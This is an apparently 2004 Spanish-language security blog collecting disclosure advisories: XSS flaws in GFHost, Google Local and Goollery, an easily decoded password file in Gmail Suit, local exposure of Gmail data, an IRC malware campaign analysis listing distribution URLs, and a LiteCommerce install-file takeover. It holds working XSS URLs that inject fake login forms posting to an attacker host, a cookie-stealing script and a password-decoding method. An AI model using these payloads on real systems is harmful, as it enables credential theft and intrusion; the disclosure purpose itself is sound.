Multiples XSS vulnerability in Gfhost "Gmail hosting"

Friday, November 05, 2004


#############################################
###### Multiples XSS vulnerability in Gfhost
###### "Gmail hosting"
###### vendor Url:http://gfhost.mybesthost.com/
###### vendor notify: yes vendor respose : NO
####### xploit included: yes
#############################################


GFHost es un script que permite que uses tu cuenta de correo de Gmail para crear una página en la cuál se publicarán todos los archivos adjuntos de tus mensajes que esten guardados bajo algún label en tu cuenta de correo.De esta forma cualquier persona que visite tu página podrá descargar todos estos archivos.
Las categorías que están en la página generada por el programa son los labels que tengas en tu cuenta de correo, es decir, si en tu cuenta de correos tienes dos labels ("musica" y "videos") esas serán las categorías que están en tú página

posee una vulnerabilidad la cual permite tanto spofear el sitio atraves de Cross site scripting (XSS) ,asi mismo un usuario mal intencionado podria llegar a subir un archivo al hoting y desde el ejecutar funciones de php por ejemplo ,o realizar en si ataques de tipo XSS con el fin de obtener por ejemplo el usuario y el password de los usuarios incautos

son varios files los que permiten esta accion

y alguno de esos "xploits" podrias ser estos:

file label.php

http://[target]/label.php?label=%3Cbody%3E%3Cform%20action=
http://www.atacker.com/save.php%20method=post%3EUsername:
%3Cinput%20name=username%20type=text%20maxlength=
30%3E%3Cbr%3EPassword:%3Cinput%20name=password%20type=
text%20maxlength=30%3E%3Cbr%3E%3Cinput%20name=login%20type=
submit%20value=Login%3E%3C/form%3E%3C/body

file dl.php

http://[Target]/dl.php?a=0.1&OUR_FILE=ff24404eeac528b&f=config.php


Podemos enviar un archivo a un a categoria determinada(anyfile.php)y despues
usar ese archivo enviado para ejecutar comandos.Los archivos se envian a User_name_account+"Label"@gmail.com

exaple of Anyfile.php

php code to get cookie

$archivo = 'tostada.txt';
$fp = fopen($archivo, "a");
$string = "\n $cookie";
$write = fputs($fp, $string);
fclose($fp);

script to include in the body
location.href="anyfile.php?cookie="+document.cookie+""



atentamente
Lostmon (lostmon@gmail.com)

Thank Ipy she is In my heart
Thanks to http://www.ayuda-internet.net (#Ayuda_Internet) for their support
and thx to Estrella to be my ligth.

--
La curiosidad es lo que hace mover la mente...

Google Local posee agujeros de tipo XSS


##################################################
Google local XSS vulnerability
os: win 2000 sp4 Ie 6.x whith all fixes
vendor url: http://www.google.es/lochp http://local.google.com/
original advisore: http://lostmon.spymac.net/blog/
###################################################

Google Local Te ayuda a buscar en una localizacion en concreto bien sea un provincia o pueblo ,un eterminado local o empresa o otros tipos de busquedas locales.Sin embargo posee alguna falla de seguridad (XSS) si intruducimos una palabra en el cuadro con la etiqueta "que" e introducimos
codigo html en el Form con la etiqueta "donde"este codigo sera ejecutado sin ningun problema.


Una demostracion de esta circunstancia o xploit:

http://www.google.es/local?hl=es&lr=
&q=xx&near=%3Cbody%3E%3Ch1%3EXSS%2520poW

EJEMPLO 1
http://local.google.com/local?hl=es&lr=&q
=lalala&near=%3Cbody%3E%3Cp%3E%3Ch1%3EGoogle+hacked
+%21%21%21+lostmon+was+here+%3AD%3C%2Fh1%3E%3C%2Fp%3


E%3Cp%3ENo+les+abandones+%2C+ellos+no+lo+harian%3C%2Fp%3E%3C
img+src%3D%22http%3A%2F%2Fwww.kellypocharaquel.com.ar%2Fimages%2F
Gata_Misha_con_cria.jpg%22+alt%3D%22Google+Local%22%3E%3C%2Fbody%3
E&btnG=B%C3%BAsqueda

EJEMPLO 2



y pq no pedirle usuario y password al usuario incauto ???

http://local.google.com/local?hl=es&lr=&q=cafe
&near=%3Cbody%3E%3Cform%20action%3D%22http%3A%2
F%2Fwww.atacker.com%2Fsave2db.asp%22+method%3D%22
post%22%3EUsername%3A%3Cinput+name%3D%22username%
22+type%3D%22text%22+maxlength%3D%2230%22%3E%3Cbr
%3EPassword%3A%3Cinput+name%3D%22password%22+type%
3D%22text%22+maxlength%3D%2230%22%3E%3Cbr%3E%3Cinput
+name%3D%22login%22+type%3D%22submit%22+value%3D%22Login
%22%3E%3C%2Fform%3E%3C%2Fbody%3E&btnG=B%C3%BAsqueda


EJEMPLO 3

securitytracker url: http://www.securitytracker.com/alerts/2004/Nov/1012081.html


Atentamente:

Lostmon (Lostmon@Gmail.com)

Thnx to www.Ayuda-Internet.net for their support
Thnx to Estrella to be my ligth
Ipy :*****

--
La curiosidad es lo que hace mover la mente....

A Dia de Hoy parece haber sido solucionada esta situacion 05/11/2004


XSS iN Goollery Gmail script for view Photo Galery

##############################################
#XSS iN Goollery Gmail script for view Photo Galery #
# os-win 2000 sp4 Ie 6.x All fixes #
#Vendor URL: http://www.wirzm.ch/goollery/about/about.php#
#advisore original:http://lostmon.spymac.net/blog/ ####
#OSVDB ID:11318,11319,11320 ,11624
#############################################


Goollery es photo gallery Basado en Gmail. Puedes subir imagenes desde un website. Estas imagenes
seran añadidas automaticamente y guardadas en tu cuenta de Gmail.

Este script posee alguna vulneravilidad que permitiria a un usuario mal intencionado
hacerse con la cookie de seseion o spofear la imagen de la galeria atraves de un agujero
conocido como XSS (Cross site scripting).Este es un ejemplo de explotacion de esa circunstancia.

#######################################
#File viewalbun.php and viewpic.php XSS vunerability #
#######################################

http://[TARGET]/goollery/viewalbum.php?conversation_id=
ffee00b71f3931a&page=[XSS-CODE]&sess=daf5c642ade1162f15c4eb4b7e89da17

Escritura en pagina lo cual nos permitiria spofear el sitio...

http://[TARGET]/goollery/viewpic.php?id=2&conversation_id=
ffee00b71f3931a&btopage=[XSS-CODE]&sess=daf5c642ade1162f15c4eb4b7e89da17

Atentamente:

Lostmon (Lostmon@Gmail.com)

Thnx to www.Ayuda-Internet.net for their support
Thnx to Estrella to be my ligth
Ipy :*****

OSVDB url: http://www.osvdb.org/searchdb.php?action=search_title&vuln_title=goollery

Securitytracker url: http://securitytracker.com/alerts/2004/Nov/1012062.html
--
La curiosidad es lo que hace mover la mente

Gmail suit deja ver el password codificado y este puede ser descodificado


Gmail Suit es una aplicacion que ofrece diferentes
utilidades para gmail y añade menus contextuales
a nuestro explorer para poder tanto consultar como enviar
correos a gmail desde dicha suit

Gmail suit una vez instalado deja en la carpeta de usuario

(documents and settingsuser_nameApplication DataGSuit )
crea un archivo llamado settings.xml
si miramos dentro de este archivo vemos varios datos

User_name_login

ìïéóìáîå

1- el nombre de usuario de la cuenta de gmail
2- el password codificado de alguna manera

el password codificado tiene la misma longitud de caracteres
que el password en texto plano introducido por el usuario
faltaria saber como descodificarlo que seria tan sencillo como
pasar caracter por caracter a su valor ASCII (http://www.bbsinc.com/symbol.html)
restarle 128 y el resultado mirar en la tabla ASCII y tendremos el caracter
correcto del password

ejemplo:

ì=(236-128)=108 108 = l

otro caracter
á=(225-128)=97 97=a

caracter a caracter podriamos descodificar el password

ìïéóìáîå=loislane

securitytracker url: http://securitytracker.com/alerts/2004/Oct/1011994.html
OSVDB ID : 11176
atentamente:

Lostmon (lostmon@gmail.com)

Thank Ipy and [D]aRk You are The best friends
Thanks to http://www.Ayuda-Internet.net (#Ayuda_Internet) for support
and thx to Estrella to be my ligth.

--
La curiosidad es lo que hace mover la mente....

NEW RELEASE GSuite R14 DATE 30-10-2004
http://kb.imspire.com/support/2004-11-A.html

Gmail deja ver la lista de contactos a un usuario local


Gmail deja ver la lista de contactos a un usuario local

Procedimiento:


Abrimos nuestro navegador, y vamos a la web Http://Gmail.google.com
y tenemos acceso a nuestra cuenta.Escribimos nuestros correos, las actividades y cerramos el navegador,o nuestra sesión, es igual. inmediatamente abrimos a nuestro explorador de Windows, los archivos temporales de Internet y tomamos los archivos temporales de Gmail. Copiamos estos archivos en una carpeta, y entonces con el notepad abrimos los archivos del siguientes:



  • gmail[1]

  • gmail[2]

  • gmail[3]

  • etc.

    Uno de estos archivos contiene la lista con todos nuestros contactos, y cualquiera usuario,mirando nuestros ficheros temporales en esta PC, podría tener acceso y ver a los contactos de nuestros gmail

    atentamente

    Lostmon (lostmon@gmail.com )

    Thanks to LuTRiZiA always in my mind
    Thanks to http://www.ayuda-internet.net(#Ayuda_Internet) for support
    and thx to Estrella to be my ligth.

    La curiosidad es lo que hace mover la mente...


    Gmail drive deja ver el nombre de usuario y da acceso a la cuenta de correo


    Ante la avalancha de gente que usa la nueva funcionalidad para gmail

    gmail drive (http://www.viksoe.dk/code/gmail.htm)

    Se ha descubierto que un usuario local podria obtener el nombre de usuario con el que se inicio sesion en el disco siva a mi pc , mira las propiedades del disco de Gmail y en la etiqueta de volumen estara el nombre de usuario que inicio sesion en el disco...


    Si ademas marcamos la opcion de "auto login" un usuario local ademas podria abrir el navegador, dirigirse a la direccion http://gmail.google.com y al estar ya logeado en el Gmail drive ..seria automaticamente redirigido hacia la cuenta de correo del usuario



    Atentamente

    Lostmon ( lostmon@gmail.com )

    OSVDB ID 10940
    http://www.securitytracker.com/alerts/2004/Oct/1011758.html

    thx to www.Ayuda-Internet.net for their support
    thx to Ghalician he is whith me and investigate :)

    La curiosidad es lo que hace mover la mente....

    Virus/malware activo por las redes de IRC


    Ante la oleada de infeciones producidas por un virus/malware activo en la red de Irc-Hispano,y otras redes, desde #ayuda_internet ,
    preocupados por esta infección, que cada dia se esta extendiendo mas ,
    decidimos investigar cual podria ser la causa de la situacion e intentar
    llegar cuanto antes a una solucion rapida y eficaz para el usuario que visita la red.

    Asi os exponemos hoy el resultado de ese análisis o de esa investigación
    para asi ...en conocimiento de todos intentemos por lo menos ,no quedar
    infectados o si lo estubiesemos intentar desinfectarnos cuanto antes.

    Analisis de la situación:

    Los que sois asiduos al canal os habreis dado cuenta de que
    ultimamente nuestro bot banea muy seguido a una serie de usuarios que
    hacen spam por privado...

    El motivo no es otro que intentar protegeros de la amenaza de ese
    virus ..el "modus operandi" de ese virus es el siguiente:

    Entran usuarios con un nick aleatorio a una red de irc ,entran en un
    canal o varios y dejan por privado o por el general una url ,el usuario
    incauto que clica en ellas,y descarga el programa malware y lo ejecuta
    queda infectado.

    =============================
    url "capturadas" son estas:
    =============================
    http://hotgirl.such.info If you love amateurs... real amateurs, this
    is the best site on the net. Don't wait another second for these porn star wannabe's! CLICK HERE NOW -your ***** will thank you!

    http://hardporn.be.tf The most provocative and fantastic ,high tempo
    hard porn,fliery *****ing scenes,school girls,crazy lolitas all of them
    are in this web

    http://smssend.tr.gs Text Message anyone worldwide free with
    International SMS Messaging No signup required..! iF you want to send
    only click this site..!

    http://newmp3s.gen.ms Click Here! Free Downloads AZ, Full Mp3 Albums,
    New Mp3 Albums ..

    http://freemp3.here.ws Do you want to Listen All of the Singer's New
    album and New SingLes..? aLso it Ýs free..! only click This Site..!
    Full albums and a Lot of mp3 Free..!

    ===========================================================

    Despues de hacer un seguimiento de las webs e intentar "ver" el
    motivo por el cual puede pasar esto y que referencia tiene con esas
    webs ,nos damos cuenta de que todas las url llevan a una misma web
    desde la cual se descargan archivos con doble extension

    La web donde llevan es a esta http://cyprusturk.net/porn/
    web que guarda en ese directorio varios archivos exe para descargar,
    dependiendo del dominio desde el que se venga algunos ejemplos son estos :




    asiavideo.mpeg.exe
    sex.mpeg.exe
    good.mp3.exe
    real.mp3.exe


    Lleva a muchos mas con diferentes nombres y diferentes primeras
    extensiones,es algo deliverado ,pues se incluye en el exe el icono perteneciente a la extension mpeg o mp3 con lo cual el usuario mediano llegaria a ejecutar esa "pelicula" o ese "mp3" y entonces es cuando el exe es desempaquetado y instalado.Por el analisis de algunas de esos archivos llegamos a la siguiente informacion :

    ********************************************************************
    FileAlyzer © 2003 Patrick M. Kolla. All Rights Reserved.
    ********************************************************************

    File: C:Do*****ents and
    SettingsadministradorEscritoriohispanogood.mp3.exe
    Date: 13/09/2004 17:47:29

    ***** General ******************************************************
    Location: C:Do*****ents and SettingsadministradorEscritoriohispano
    Size: 4823545
    Version: 1.6.0.0
    CRC-32: 9F6F50FC
    MD5: CE6CD747A6C8A62334290EE8E85D5EBB
    Read only: No
    Hidden: No
    System file: No
    Directory: No
    Archive: Yes
    Symbolic link: No
    Time stamp: lunes, 13 de septiembre de 2004 17:24:36
    Creation: lunes, 13 de septiembre de 2004 17:03:02
    Last access: lunes, 13 de septiembre de 2004 17:43:28
    Last write: lunes, 13 de septiembre de 2004 17:24:36

    ***** Version ******************************************************
    Supported languages:: Inglés (Estados Unidos) (1033/1252)
    --- Version --------------------------------------------------------
    File version: 1, 6, 0
    Company name: instyler installation software
    Internal name: setup.exe
    Comments: www.instyler.com info@instyler.com
    Legal copyright: Copyright © 2000 Sebastian Brand
    Legal trademarks:
    Original filename: setup.exe
    Product name: instyler ex-it!
    Product version: 1, 6, 0
    File description: instyler ex-it! Self-Extractor
    Private build:
    Special build:

    ***** Resources ****************************************************
    --- Cursor ---------------------------------------------------------
    1
    2
    3
    4
    5
    6
    --- Bitmap ---------------------------------------------------------
    BBABORT
    BBALL
    BBCANCEL
    BBCLOSE
    BBHELP
    BBIGNORE
    BBNO
    BBOK
    BBRETRY
    BBYES
    CDROM
    CLOSEDFOLDER
    CURRENTFOLDER
    EXECUTABLE
    FLOPPY
    HARD
    KNOWNFILE
    NETWORK
    OPENFOLDER
    RAM
    TNEWBEVEL
    TNEWGAUGE
    UNKNOWNFILE
    --- Icon -----------------------------------------------------------
    1
    2
    3
    4
    --- String Table ---------------------------------------------------
    3841
    3842
    3843
    3844
    3845
    3846
    3847
    3848
    3849
    3850
    3851
    3852
    3853
    4089
    4090
    4091
    4093
    4094
    4095
    --- RCData ---------------------------------------------------------
    TFLIC
    TFOLFORM
    TINSTALLFORM
    TMAINFORM
    TPWDFORM
    --- Cursor Group ---------------------------------------------------
    32762
    32763
    32764
    32765
    32766
    32767
    --- Icon Group -----------------------------------------------------
    MAINICON
    --- Version Info ---------------------------------------------------
    1
    --- XP Manifest ----------------------------------------------------
    1
    ?xml version="1.0" encoding="UTF-8" standalone="yes"?
    assembly xmlns="urn:schemas-microsoft-com:asm.v1"
    manifestVersion="1.0"
    assemblyIdentity
    name="Your.Application.Name.Here"
    processorArchitecture="x86"
    version="1.0.0.0"
    type="win32"/
    description Windows Shell /description
    dependency
    dependentAssembly
    assemblyIdentity
    type="win32"
    name="Microsoft.Windows.Common-Controls"
    version="6.0.0.0"
    processorArchitecture="x86"
    publicKeyToken="6595b64144ccf1df"
    language="*"
    dependentAssembly
    /dependency
    /assembly

    ***** PE Header ****************************************************
    Signature: 00004550
    Machine: 014C - Intel 386
    Number of sections: 0008
    Time/Date stamp: 2A425E19
    Pointer to symbol table: 00000000
    Number of symbols: 00000000
    Size of optional header: 00E0
    Characteristics: 818F
    Magic: 010B
    Linker version (major): 02
    Linker version (minor): 19
    Size of code: 00036A00
    Size of initialized data: 0000FC00
    Size of uninitialized data: 00000000
    Address of entry point: 00037468
    Base of code: 00001000
    Base of data: 00038000
    Image base: 00400000
    Section alignment: 00001000
    File alignment: 00000200
    OS version (major): 0001
    OS version (minor): 0000
    Image version (major): 0000
    Image version (minor): 0000
    Sub system version (major): 0004
    Sub system version (minor): 0000
    Win32 version: 00000000
    Size of image: 0004E000
    Size of headers: 00000400
    Checksum: 00000000
    Sub system: 0002 - Windows graphical user interface
    (GUI) subsystem
    DLL characteristics: 0000
    Size of stack reserve: 00100000
    Size of stack commit: 00004000
    Size of heap reserve: 00100000
    Size of heap commit: 00001000
    Loader flags: 00000000
    Number of RVA: 00000010

    ***** PE Sections **************************************************
    CRC-32: ?
    MD5: ?
    ----- PE Sections --------------------------------------------------
    Section VirtSize VirtAddr PhysSize PhysAddr Flags
    CODE 00036854 00001000 00036A00 00000400 60000020
    DATA 00001DE4 00038000 00001E00 00036E00 C0000040
    BSS 00002508 0003A000 00000000 00038C00 C0000000
    .idata 00001CBA 0003D000 00001E00 00038C00 C0000040
    .tls 00000008 0003F000 00000000 0003AA00 C0000000
    .rdata 00000018 00040000 00000200 0003AA00 50000040
    .reloc 000033D8 00041000 00000000 00000000 50000040
    .rsrc 00008A00 00045000 00008A00 0003AC00 50000040

    ***** Import/Export table ******************************************
    --- Export table ---------------------------------------------------
    --- Import table (libraries: 12) -----------------------------------
    kernel32.dll (imports: 36)
    DeleteCriticalSection
    LeaveCriticalSection
    EnterCriticalSection
    InitializeCriticalSection
    VirtualFree
    VirtualAlloc
    LocalFree
    LocalAlloc
    WideCharToMultiByte
    TlsSetValue
    TlsGetValue
    SetCurrentDirectoryA
    RemoveDirectoryA
    MultiByteToWideChar
    GetModuleHandleA
    GetModuleFileNameA
    GetLastError
    GetCommandLineA
    GetCurrentDirectoryA
    ExitThread
    CreateThread
    CreateDirectoryA
    WriteFile
    SetFilePointer
    SetEndOfFile
    RtlUnwind
    ReadFile
    RaiseException
    MoveFileA
    GetStdHandle
    GetFileSize
    GetFileType
    ExitProcess
    DeleteFileA
    CreateFileA
    CloseHandle
    user32.dll (imports: 1)
    MessageBoxA
    oleaut32.dll (imports: 5)
    VariantChangeTypeEx
    VariantCopyInd
    VariantClear
    SysStringLen
    SysAllocStringLen
    advapi32.dll (imports: 6)
    RegSetValueExA
    RegQueryValueExA
    RegOpenKeyExA
    RegFlushKey
    RegCreateKeyExA
    RegCloseKey
    kernel32.dll (imports: 64)
    WriteFile
    WinExec
    WaitForSingleObject
    VirtualAlloc
    TerminateThread
    SizeofResource
    SetFileTime
    SetFilePointer
    SetFileAttributesA
    SetErrorMode
    SetCurrentDirectoryA
    ResumeThread
    ReadFile
    MultiByteToWideChar
    MulDiv
    LockResource
    LocalFileTimeToFileTime
    LoadResource
    LoadLibraryA
    GlobalUnlock
    GlobalReAlloc
    GlobalHandle
    GlobalLock
    GlobalFree
    GlobalDeleteAtom
    GlobalAlloc
    GlobalAddAtomA
    GetWindowsDirectoryA
    GetVolumeInformationA
    GetVersionExA
    GetVersion
    GetSystemDirectoryA
    GetSystemDefaultLCID
    GetShortPathNameA
    GetProcAddress
    GetModuleFileNameA
    GetLogicalDrives
    GetLocaleInfoA
    GetLastError
    GetFullPathNameA
    GetFileAttributesA
    GetExitCodeThread
    GetExitCodeProcess
    GetEnvironmentVariableA
    GetDriveTypeA
    GetCurrentThreadId
    GetCurrentProcessId
    GetCurrentProcess
    FreeResource
    FreeLibrary
    FindResourceA
    FindNextFileA
    FindFirstFileA
    FindClose
    FileTimeToLocalFileTime
    FileTimeToDosDateTime
    DosDateTimeToFileTime
    DeleteFileA
    CreateThread
    CreateProcessA
    CreateFileA
    CreateDirectoryA
    CompareStringA
    CloseHandle
    mpr.dll (imports: 1)
    WNetGetConnectionA
    version.dll (imports: 3)
    VerQueryValueA
    GetFileVersionInfoSizeA
    GetFileVersionInfoA
    gdi32.dll (imports: 58)
    UnrealizeObject
    TextOutA
    StretchDIBits
    StretchBlt
    SetWindowOrgEx
    SetWinMetaFileBits
    SetViewportOrgEx
    SetTextColor
    SetStretchBltMode
    SetROP2
    SetEnhMetaFileBits
    SetBkMode
    SetBkColor
    SelectPalette
    SelectObject
    SaveDC
    RestoreDC
    Rectangle
    RectVisible
    RealizePalette
    PlayEnhMetaFile
    PatBlt
    MoveToEx
    IntersectClipRect
    GetWindowOrgEx
    GetWinMetaFileBits
    GetTextMetricsA
    GetTextExtentPointA
    GetSystemPaletteEntries
    GetStockObject
    GetPixel
    GetPaletteEntries
    GetObjectA
    GetEnhMetaFilePaletteEntries
    GetEnhMetaFileHeader
    GetEnhMetaFileBits
    GetDeviceCaps
    GetDIBits
    GetCurrentPositionEx
    GetClipBox
    GetBitmapBits
    ExcludeClipRect
    EnumFontsA
    DeleteObject
    DeleteEnhMetaFile
    DeleteDC
    CreateSolidBrush
    CreateRectRgn
    CreatePenIndirect
    CreatePalette
    CreateFontIndirectA
    CreateDIBitmap
    CreateCompatibleDC
    CreateCompatibleBitmap
    CreateBrushIndirect
    CreateBitmap
    CopyEnhMetaFileA
    BitBlt
    user32.dll (imports: 135)
    WindowFromPoint
    WinHelpA
    WaitMessage
    WaitForInputIdle
    UpdateWindow
    UnregisterClassA
    UnhookWindowsHookEx
    TranslateMessage
    TranslateMDISysAccel
    TrackPopupMenu
    SystemParametersInfoA
    ShowWindow
    ShowOwnedPopups
    ShowCursor
    SetWindowRgn
    SetWindowsHookExA
    SetWindowTextA
    SetWindowPos
    SetWindowPlacement
    SetWindowLongA
    SetTimer
    SetScrollPos
    SetScrollInfo
    SetRect
    SetPropA
    SetMenu
    SetForegroundWindow
    SetFocus
    SetCursor
    SetCapture
    SetActiveWindow
    SendMessageA
    ScrollWindow
    ScreenToClient
    RemovePropA
    RemoveMenu
    ReleaseDC
    ReleaseCapture
    RegisterWindowMessageA
    RegisterClassA
    PtInRect
    PostQuitMessage
    PostMessageA
    PeekMessageA
    OffsetRect
    OemToCharA
    MessageBoxA
    MapWindowPoints
    MapVirtualKeyA
    LoadStringA
    LoadIconA
    LoadCursorA
    LoadBitmapA
    KillTimer
    IsZoomed
    IsWindowVisible
    IsWindowEnabled
    IsWindow
    IsRectEmpty
    IsIconic
    IsDialogMessageA
    InvalidateRect
    IntersectRect
    InsertMenuItemA
    InsertMenuA
    InflateRect
    GetWindowThreadProcessId
    GetWindowTextA
    GetWindowRgn
    GetWindowRect
    GetWindowPlacement
    GetWindowLongA
    GetSystemMetrics
    GetSystemMenu
    GetSysColor
    GetSubMenu
    GetScrollPos
    GetPropA
    GetParent
    GetWindow
    GetMenuStringA
    GetMenuState
    GetMenuItemCount
    GetMenu
    GetLastActivePopup
    GetKeyState
    GetKeyNameTextA
    GetIconInfo
    GetForegroundWindow
    GetFocus
    GetDesktopWindow
    GetDCEx
    GetDC
    GetCursorPos
    GetCursor
    GetClipboardData
    GetClientRect
    GetClassInfoA
    GetCapture
    GetActiveWindow
    FrameRect
    FillRect
    EqualRect
    EnumWindows
    EnumThreadWindows
    EndPaint
    EnableWindow
    EnableMenuItem
    DrawTextA
    DrawMenuBar
    DrawIcon
    DrawFocusRect
    DrawEdge
    DispatchMessageA
    DestroyWindow
    DestroyMenu
    DestroyIcon
    DestroyCursor
    DeleteMenu
    DefWindowProcA
    DefMDIChildProcA
    DefFrameProcA
    CreateWindowExA
    CreatePopupMenu
    CreateMenu
    CreateIcon
    ClientToScreen
    CheckMenuItem
    CallWindowProcA
    CallNextHookEx
    BeginPaint
    CharLowerBuffA
    CharLowerA
    CharUpperBuffA
    AdjustWindowRectEx
    comctl32.dll (imports: 12)
    ImageList_GetDragImage
    ImageList_DragShowNolock
    ImageList_SetDragCursorImage
    ImageList_DragMove
    ImageList_DragLeave
    ImageList_DragEnter
    ImageList_EndDrag
    ImageList_BeginDrag
    ImageList_SetBkColor
    ImageList_ReplaceIcon
    ImageList_Destroy
    ImageList_Create
    ole32.dll (imports: 3)
    CoCreateInstance
    CoUninitialize
    CoInitialize
    shell32.dll (imports: 1)
    ShellExecuteA
    ********************************************************************
    FileAlyzer © 2003 Patrick M. Kolla. All Rights Reserved.
    ********************************************************************

    Estamos en un seguimiento mayor de esta situacion ya que cada vez son
    mas los usuarios que dia a dia entran en el irc y dejan el link hacia
    la web ...lo que nos hace pensar que sea lo ke sea se esta extendiendo
    y deprisa ... pues en apenas dos dias hemos pasado de uno o dos
    usuarios o bots que entraban a ya casi los 100 por dia en diferentes
    canales.

    Despues de observar esta situacion y pensar en que hacer , decidimos
    enviar muestras a las casas antivirus (panda,mcaffe,bitdefender,avp y
    alguno mas) hasta ahora solo mcaffe contesto a nuestro rekerimiento
    ,contestando
    sobre el archivo de muestra enviado lo siguiente :

    ==================================
    fwd del mail de mcaffe con la respuesta :
    ==================================
    From: Virus Research virus_research@avertlabs.com
    Date: Mon, 13 Sep 2004 12:15:50 -0700
    Subject: RE: Escalation: 1301426 - Re: posible nuevo virus ???
    To: Lostmon lostmon@gmail.com

    A.V.E.R.T. Sample Analysis
    Issue Number:1301426
    Virus Research Analyst: Brant Yaeger
    Identified: mrsn.ex ... Found application HideWindow.
    ping.hlp ... Found the IRC/Flood.bi trojan !!!
    rebot.dll ... Found application IRC/Flood.tool.
    Symad.ex ... Found application Tool-WGet.
    tuqa.dll ... Found application IRC/Flood.tool.
    Windows.icm ... Found the IRC/Flood.dt trojan !!!
    zerz.dll ... Found the IRC/Seiseni.worm virus !!!

    AVERT(tm) Labs, Beaverton, OR

    Thank you for submitting your suspicious files.

    Synopsis -

    This malware can be identified and removed with our current scanners
    (Version 4x Engine 4.2.60 + the current DAT).

    In order to get the fastest possible response, you may wish to submit future
    virus-samples to http://www.webimmune.net. In most cases it can respond
    almost instantly with a solution.

    More and more malware threats are taking advantage of open file and printer
    shares to spread, without users having to actually execute any files.

    If your computer is not networked with other machines, there is no need to
    have file and printer sharing installed, so it should be disabled. If your
    computer is networked with others, you may need to have some level of file
    and printer sharing. In either case, if you are affected by one of these
    threats, you may need to adjust your level of file and printer sharing to
    take care of the problem.

    Please consult with your administrator before making any changes on your
    own, if you're on a LAN.

    For other virus-related information, please see the AVERT homepage at:
    http://vil.mcafeesecurity.com/vil/default.asp

    Solution -

    If you are using an Engine older than what is current, we strongly recommend
    that you upgrade as, in a lot of cases, an old engine will not identify and
    remove certain malware (even with a current set of DAT files). So, as well
    as DAT files, engines need to be updated to include regular changes and
    improvements made to the scanner.

    =======================================================

    Lo cual en resumidas cuentas dice viene a decir ...que si que hay
    codigo virico en esos
    programas o esos exe que son descargados...y ademas nos proporcionan
    las partes de esos virus o
    malware( los payloads),que son los archivos que se instalan en sistema
    una vez ejecutado el exe ...

    Despues de haber echo algunas pruebas con algun antivirus
    por ahora solo mcaffe nos lo ha detectado con el engine 4.x y las
    ultimas bases de datos del antivirus ( el dat ke contiene las firmas
    de virus).. revisar esta informacion y intentar no clicar en ninguna
    web quie no conozcais ,y si por lo ke sea llegais a una de esas webs
    ni se os ocurra ejecutar el exe ke se descarga ,si usais opera o otro
    navegador que no sea explorer , lo vereis enseguida pues en la ventana
    de descarga vereis la doble extension y la ultima sera un exe ..ir
    con cuidado.

    atentamente:
    El equipo de #ayuda_internet

    http://www.ayuda-internet.net
    La ayuda ..nuestra razón de ser.

    Tiendas vistuales basadas en Litecommerce vulnerables


    En los ultimos das surgio una vulnerabilidad en postnuke

    (http://www.securitytracker.com/alerts/2004/Jul/1010755.html)


    despues de leer el advisore y buscar en google con fines estadisticos los posibles sites vulnerables,me di cuenta de que no todos los links ivan a dar digamos a paginas normales en postnuke, si no que algunos de esos link ivan directamente al archivo de instalacion de un tipo de tienda virtual llamada litecommerce (http://www.litecommerce.com/) en una instalacion por defecto ,la tienda deja un archivo llamado 'install.php' como en el bug anterior de postnuke,desde ese archivo podemos iniciar la instalacion de la tienda virtual remotamente.podriamos reconfigurar el site completamente,pass de la base de datos,contenidos dela tienda ,percios y demas.todo seria perfecto si ... en algunas de las interfaces encontradas no pidiera el 'auth code ' es como el serial de proteccion ,para el uso indebido del script.No es en todas las interfaces que pide ese codig ,encontramos versiones 2.0.0 con el form para el code y la misma version,sin el form ,lo cual si permitia la instalacion,y configuracion del sitepara explotar la vulnerabilidad ,bastaria con encuntrar ese archivo ,que suele estar aqui: http://www.hosts.com/install.php http://www.host.com/path_to_shop/install.php
    no he tenido acceso a un numero de serie estandar del soft para poder establecer,o decir si con cualkier numero del programa ,podria iniciarse la instalacion en cualkier site que estubiese basado en litecommerce

    thx to http://www.ayuda-internet.net/ por su apoyo :)
    thx Estrella ya sabes que eres mi luz ;P
    thx to Rottew & Lutrizia formamos buena familia no ?? :DD
    by lostmon (lostmon@gmail.com)

    Securitytracker url: http://securitytracker.com/alerts/2004/Jul/1010778.html

    La curiosidad es lo que hace mover la mente

     

    Browse

    About:Me

    My blog:http://lostmon.blogspot.com
    Mail:Lostmon@gmail.com
    Lostmon Google group
    Lostmon@googlegroups.com

    La curiosidad es lo que hace
    mover la mente...